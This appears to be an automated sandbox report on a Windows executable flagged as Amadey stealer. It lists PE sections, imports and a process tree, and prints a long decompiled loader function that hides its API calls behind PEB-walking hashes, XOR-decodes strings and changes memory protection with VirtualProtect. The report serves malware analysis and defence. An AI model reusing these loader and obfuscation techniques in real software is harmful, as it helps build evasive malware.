mov ebx, eax
call 00007F0C60A4F420h
sub esp, 04h
mov dword ptr [00536A54h], eax
mov dword ptr [esp+04h], 004F1013h
mov dword ptr [esp], ebx
call 00007F0C60A4F440h
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 004F1029h
mov dword ptr [esp], ebx
call 00007F0C60A4F42Bh
sub esp, 08h
mov dword ptr [004B7000h], eax
test esi, esi
je 00007F0C60A25473h
mov dword ptr [eax+eax+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x137000	0xb98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x25a206	0x27c8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x139004	0x18	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x137230	0x1cc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb5b5c	0xb5c00	False	0.379203114254	data	6.26139811273	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.data	0xb7000	0x39ce8	0x39e00	False	0.75697725432	data	7.53280661319	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.rdata	0xf1000	0xb1d8	0xb200	False	0.318929950843	data	5.61563738189	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/4	0xfd000	0x38a80	0x38c00	False	0.180035965033	data	4.78722613482	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.bss	0x136000	0xb60	0x0	False	0	empty	0.0	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.idata	0x137000	0xb98	0xc00	False	0.4052734375	data	4.97230024056	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.CRT	0x138000	0x18	0x200	False	0.046875	data	0.118369631259	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.tls	0x139000	0x20	0x200	False	0.05859375	data	0.22482003451	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/14	0x13a000	0xd8	0x200	False	0.189453125	data	1.05435750986	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/29	0x13b000	0x14e37	0x15000	False	0.38714890253	data	6.07122897105	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/41	0x150000	0x13b8	0x1400	False	0.25234375	data	4.72334895544	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/55	0x152000	0x1f23	0x2000	False	0.54150390625	data	6.21611847392	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/67	0x154000	0x38	0x200	False	0.1171875	TIM image, (3080,1028)	0.668238434502	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/80	0x155000	0x2ae	0x400	False	0.3525390625	data	3.87768624749	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/91	0x156000	0x829a	0x8400	False	0.315814393939	data	4.14712052349	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/102	0x15f000	0xcd8	0xe00	False	0.345145089286	data	3.1533400052	IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileA, FindNextFileA, FreeLibrary, GetCommandLineA, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, InitializeCriticalSection, InterlockedDecrement, InterlockedExchange, InterlockedIncrement, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, ReleaseSemaphore, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualAlloc, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
msvcrt.dll	_fdopen, _fstat, _lseek, _read, _strdup, _stricoll, _write
msvcrt.dll	__getmainargs, __mb_cur_max, __p__environ, __p__fmode, __set_app_type, _cexit, _errno, _filbuf, _flsbuf, _fmode, _fpreset, _fullpath, _iob, _isctype, _onexit, _pctype, _setmode, abort, atexit, atoi, calloc, fclose, fflush, fopen, fputc, fputs, fread, free, fseek, ftell, fwrite, getenv, getwc, iswctype, localeconv, malloc, mbstowcs, memchr, memcmp, memcpy, memmove, memset, putwc, realloc, setlocale, setvbuf, signal, sprintf, strchr, strcmp, strcoll, strerror, strftime, strlen, strtod, strtoul, strxfrm, tolower, towlower, towupper, ungetc, ungetwc, vfprintf, wcscoll, wcsftime, wcslen, wcstombs, wcsxfrm
USER32.dll	MessageBoxW

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: hBB2KnTndI.exePID: 6828, Parent PID: 5876

General

Target ID:	0
Start time:	19:33:03
Start date:	29/05/2022
Path:	C:\Users\user\Desktop\hBB2KnTndI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hBB2KnTndI.exe"
Imagebase:	0x400000
File size:	2476494 bytes
MD5 hash:	B413FF6E943C415AFC26640FF535C724
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.259020968.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000000.261443990.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000000.260767513.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6836, Parent PID: 6828

General

Target ID:	1
Start time:	19:33:03
Start date:	29/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: AppLaunch.exePID: 6060, Parent PID: 6828

General

Target ID:	5
Start time:	19:33:13
Start date:	29/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0x1270000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: orxds.exePID: 6188, Parent PID: 6060

General

Target ID:	7
Start time:	19:33:15
Start date:	29/05/2022
Path:	C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe"
Imagebase:	0x240000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 2%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6220, Parent PID: 6828

General

Target ID:	8
Start time:	19:33:15
Start date:	29/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 272
Imagebase:	0xb10000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: hBB2KnTndI.exePID: 6828, Parent PID: 5876COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	9.1%
Signature Coverage:	25.9%
Total number of Nodes:	220
Total number of Limit Nodes:	18

Executed Functions

Function 00411C06 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 353
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E00411C06(char _a4, char* _a8, signed int _a12, signed int _a24, signed int _a28, signed int _a32, signed int _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a64, intOrPtr _a80, intOrPtr _a88, signed int _a92, signed int _a116) {
				void* _v16;
				char _v52;
				void _v68;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				void _v79;
				char _v80;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v121;
				signed int _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				char _v160;
				char _v164;
				intOrPtr _v168;
				void* _v172;
				char _v176;
				char* _v180;
				char _v184;
				void* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t226;
				signed int _t227;
				signed int _t232;
				void* _t241;
				void* _t245;
				intOrPtr _t249;
				intOrPtr _t254;
				signed int _t260;
				signed int _t263;
				intOrPtr _t268;
				void* _t277;
				void* _t313;
				signed int _t314;
				signed int _t320;
				void* _t324;
				signed int _t326;
				signed int _t330;
				void* _t334;
				signed int _t338;
				void* _t342;
				signed int _t344;
				signed int _t347;
				void* _t349;
				void* _t358;
				void* _t365;
				signed int _t368;
				void* _t372;
				void* _t379;
				void* _t385;
				intOrPtr* _t387;
				intOrPtr* _t388;
				intOrPtr* _t392;
				void* _t397;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;

				_t402 = _t401 - 0x9c;
				_v96 = 0;
				_v116 = _a24;
				_v128 = _a36;
				_v152 = _a28;
				_v136 = _a44;
				_v132 = _a32;
				_v144 = _a92;
				_v140 = _a40;
				_v148 = _a88;
				_v120 = _a64 - 0x5c;
				while(1) {
					_t226 = _v96;
					if(_t226 >= _a12) {
						break;
					}
					if(_t226 <= 0x3c) {
						E004AC690("WHdxwVblbNfTGKiOlUygaMBQekTArfbRUCmhfExZtPGgYnJgWgdPirqBwkduLZziGoxdhACFcJxwPHBvTqJViuSIUV", _v120); // executed
					}
					if(_a4 == 0) {
						_t392 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
						while(1) {
							_t268 =  *((intOrPtr*)(_t392 + 0x18));
							_t379 =  *((intOrPtr*)(_t268 +  *((intOrPtr*)(_t268 + 0x3c)) + 0x78)) + _t268;
							if(_t268 == _t379) {
								goto L17;
							}
							L7:
							_t326 =  *(_t379 + 0x18);
							_t372 = _t326 - 1;
							_v112 = _t326 * 4 - 4;
							while(_t372 != 0xffffffff) {
								_v100 = 0xf124d613;
								_v104 =  *((intOrPtr*)(_t268 + _v112 +  *((intOrPtr*)(_t379 + 0x20)))) + _t268;
								while(1) {
									_v104 = _v104 + 1;
									_t330 =  *((intOrPtr*)(_v104 - 1));
									if(_t330 == 0) {
										break;
									}
									_v121 = _t330 - 0x41;
									_v108 = _t330;
									if(_v121 <= 0x19) {
										_v108 = _t330 | 0x00000020;
									}
									_t275 = _v100 ^ _v108;
									_v100 = (_v100 ^ _v108) * 0x1000193;
								}
								_v112 = _v112 - 4;
								_t334 = _t372 - 1;
								if(_v100 != 0x7264150e) {
									_t372 = _t334;
									continue;
								}
								_v160 = 0;
								_v164 = 0;
								_v168 = 0xb923;
								_v172 = 0;
								 *((intOrPtr*)(_t268 +  *((intOrPtr*)(_t268 + ( *(_t372 + _t372 + _t268 +  *((intOrPtr*)(_t379 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t379 + 0x1c))))))();
								_t402 = _t402 - 0x10;
								E004A6000(_t275, _t392, E004A8CB0(0x4f09a0, "dAtsTYDEuXFFALbBPGARvZXMKEqRQlmyrZozsZDLZtBSesEKlQySGhhKGBaykHvOuqUZnZxCtnbzOMynRCgITjCxbB"));
								goto L18;
							}
							L17:
							_t392 =  *_t392;
							_t268 =  *((intOrPtr*)(_t392 + 0x18));
							_t379 =  *((intOrPtr*)(_t268 +  *((intOrPtr*)(_t268 + 0x3c)) + 0x78)) + _t268;
							if(_t268 == _t379) {
								goto L17;
							}
							goto L7;
						}
					}
					L18:
					_v96 = _v96 + 1;
				}
				if(_a4 != 0) {
					_t227 = _v132;
					_t338 = _v128;
					asm("sbb ebx, edx");
					asm("cdq");
					_t232 = _v116;
					_t341 = (_t232 * _a12 >> 0x20) + _v116 * ((_t338 << 0x00000020 | _t227) << 2) + _v152 * _a12;
					asm("adc edx, ebx");
					_v172 = _t232 * _a12 + _v140 - (_t227 << 2);
					_v168 = (_t232 * _a12 >> 0x20) + _v116 * ((_t338 << 0x00000020 | _t227) << 2) + _v152 * _a12;
					_t277 =  &_v79;
					L00472AC0(0x4f09a0); // executed
					_push(_t379);
					_push(_t379);
					_v176 = memcpy( &_v68, 0x4f1d46, 4 << 2);
					_v168 = 0x2e;
					_v172 = 0x10;
					_v180 = "481035029895482919189744454404510355566990232";
					E00411B90((_t232 * _a12 >> 0x20) + _v116 * ((_t338 << 0x00000020 | _t227) << 2) + _v152 * _a12);
					_v80 = 0x7e;
					memset( &_v79, 0, 9 << 0);
					_v79 = 0x15;
					_v78 = 0x1b;
					_t241 = 0;
					_v77 = 0xc;
					_v76 = 0x10;
					_v75 = 0x1b;
					_v74 = 0x12;
					_v73 = 0x4d;
					_v72 = 0x4c;
					do {
						 *(_t277 + _t241) =  *(_t277 + _t241) ^ 0x0000007e;
						_t241 = _t241 + 1;
					} while (_t241 != 8);
					_v172 = _t277;
					_t385 = _t277;
					_v71 = 0;
					L0040146E(_t277,  &_v52, _t341, _t385, 0x4f1d46);
					_t342 =  &_v79;
					_push(0x4f1d46);
					_v80 = 0x15;
					memset(_t385, 0, 5 << 0);
					_v79 = 0x3b;
					_v78 = 0x71;
					_t245 = 0;
					_v77 = 0x79;
					_v76 = 0x79;
					do {
						 *(_t342 + _t245) =  *(_t342 + _t245) ^ 0x00000015;
						_t245 = _t245 + 1;
					} while (_t245 != 4);
					_v172 = _t342;
					_v75 = 0;
					E0049A850(_t277,  &_v52, 0x4f1d46);
					_push(_t277);
					_t387 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
					while(1) {
						_t249 =  *((intOrPtr*)(_t387 + 0x18));
						_t313 =  *((intOrPtr*)(_t249 +  *((intOrPtr*)(_t249 + 0x3c)) + 0x78)) + _t249;
						if(_t249 == _t313) {
							goto L37;
						}
						_t344 =  *(_t313 + 0x18);
						_t397 = _t344 - 1;
						_v108 = _t344 * 4 - 4;
						while(_t397 != 0xffffffff) {
							_v96 = 0x2fb93544;
							_v100 =  *((intOrPtr*)(_t249 + _v108 +  *((intOrPtr*)(_t313 + 0x20)))) + _t249;
							while(1) {
								_v100 = _v100 + 1;
								_t347 =  *((intOrPtr*)(_v100 - 1));
								if(_t347 == 0) {
									break;
								}
								_v112 = _t347 - 0x41;
								_v104 = _t347;
								if(_v112 <= 0x19) {
									_v104 = _t347 | 0x00000020;
								}
								_v96 = (_v96 ^ _v104) * 0x1000193;
							}
							_v108 = _v108 - 4;
							_t349 = _t397 - 1;
							if(_v96 != 0xa535b8d) {
								_t397 = _t349;
								continue;
							}
							_v172 = _v52;
							_v112 =  *((intOrPtr*)(_t249 +  *((intOrPtr*)(_t249 + ( *(_t397 + _t397 + _t249 +  *((intOrPtr*)(_t313 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t313 + 0x1c))))))();
							_push(_t313);
							_v80 = 0;
							_t388 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
							while(1) {
								_t254 =  *((intOrPtr*)(_t388 + 0x18));
								_t399 =  *((intOrPtr*)(_t254 +  *((intOrPtr*)(_t254 + 0x3c)) + 0x78)) + _t254;
								if(_t254 == _t399) {
									goto L38;
								}
								_t314 =  *(_t399 + 0x18);
								_t358 = _t314 - 1;
								_v108 = _t314 * 4 - 4;
								while(_t358 != 0xffffffff) {
									_v96 = 0x1ac81ebf;
									_t290 =  *((intOrPtr*)(_v108 + _t254 +  *((intOrPtr*)(_t399 + 0x20)))) + _t254;
									_v100 =  *((intOrPtr*)(_v108 + _t254 +  *((intOrPtr*)(_t399 + 0x20)))) + _t254;
									while(1) {
										_v100 = _v100 + 1;
										_t320 =  *((intOrPtr*)(_v100 - 1));
										if(_t320 == 0) {
											break;
										}
										_v116 = _t320 - 0x41;
										_v104 = _t320;
										if(_v116 <= 0x19) {
											_v104 = _t320 | 0x00000020;
										}
										_t290 = _v96 ^ _v104;
										_v96 = (_v96 ^ _v104) * 0x1000193;
									}
									_v108 = _v108 - 4;
									_t324 = _t358 - 1;
									if(_v96 != 0x58daf3eb) {
										_t358 = _t324;
										continue;
									}
									_t365 =  &_v68;
									_v176 = _v112;
									_v172 = _t365;
									 *0x536020 =  *((intOrPtr*)(_t254 +  *((intOrPtr*)(_t254 + ( *(_t358 + _t358 + _t254 +  *((intOrPtr*)(_t399 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t399 + 0x1c))))))();
									_v172 =  &_v80;
									_v176 = 0x40;
									_v184 = _a4;
									_v180 = _a8;
									VirtualProtect(_t365, _t365, ??, ??); // executed
									_t368 = _v144;
									_t260 = E0041C250(_a80, 0, _v148, _t368);
									_v96 = _t368;
									_v100 = _t260 ^ _a116;
									L00497980(_t290,  &_v52, _a4, _t399, _t400);
									_t263 = _v100;
									goto L50;
								}
								L38:
								_t388 =  *_t388;
							}
						}
						L37:
						_t387 =  *_t387;
					}
				} else {
					E004A6000(_t275, _t392, E004A8CB0(0x4f09a0, "ngNqkCxrmWjitGGcQCOTdGQkkavXRgvVoCmMJWrtPacoLEYmaeIfxTNXHhKESVkqkjGjgOUYplRxfWdomQjnuOqAnl"));
					_t263 = 0;
				}
				L50:
				return _t263;
			}

0x00411c0c
0x00411c18
0x00411c1f
0x00411c25
0x00411c2b
0x00411c34
0x00411c3d
0x00411c43
0x00411c49
0x00411c52
0x00411c5e
0x00411c61
0x00411c61
0x00411c67
0x00000000
0x00000000
0x00411c70
0x00411c80
0x00411c80
0x00411c89
0x00411c98
0x00411c9b
0x00411c9b
0x00411ca5
0x00411ca9
0x00000000
0x00000000
0x00411caf
0x00411caf
0x00411cb9
0x00411cbc
0x00411cbf
0x00411ccb
0x00411cdc
0x00411cdf
0x00411cdf
0x00411ce5
0x00411cea
0x00000000
0x00000000
0x00411d03
0x00411d0d
0x00411d10
0x00411d18
0x00411d18
0x00411d1e
0x00411d27
0x00411d27
0x00411cec
0x00411cf7
0x00411cfa
0x00411cfc
0x00000000
0x00411cfc
0x00411d3e
0x00411d46
0x00411d4e
0x00411d56
0x00411d5d
0x00411d5f
0x00411d79
0x00000000
0x00411d79
0x00411d80
0x00411d80
0x00411c9b
0x00411ca5
0x00411ca9
0x00000000
0x00000000
0x00000000
0x00411ca9
0x00411c9b
0x00411d87
0x00411d87
0x00411d87
0x00411d93
0x00411dba
0x00411dbd
0x00411ddb
0x00411ddd
0x00411ded
0x00411df3
0x00411dfc
0x00411dfe
0x00411e06
0x00411e0a
0x00411e0d
0x00411e17
0x00411e18
0x00411e21
0x00411e25
0x00411e30
0x00411e38
0x00411e3f
0x00411e4b
0x00411e4f
0x00411e51
0x00411e55
0x00411e59
0x00411e5b
0x00411e5f
0x00411e63
0x00411e67
0x00411e6b
0x00411e6f
0x00411e73
0x00411e73
0x00411e77
0x00411e78
0x00411e80
0x00411e83
0x00411e85
0x00411e89
0x00411e95
0x00411e98
0x00411e99
0x00411e9d
0x00411e9f
0x00411ea3
0x00411ea7
0x00411ea9
0x00411ead
0x00411eb1
0x00411eb1
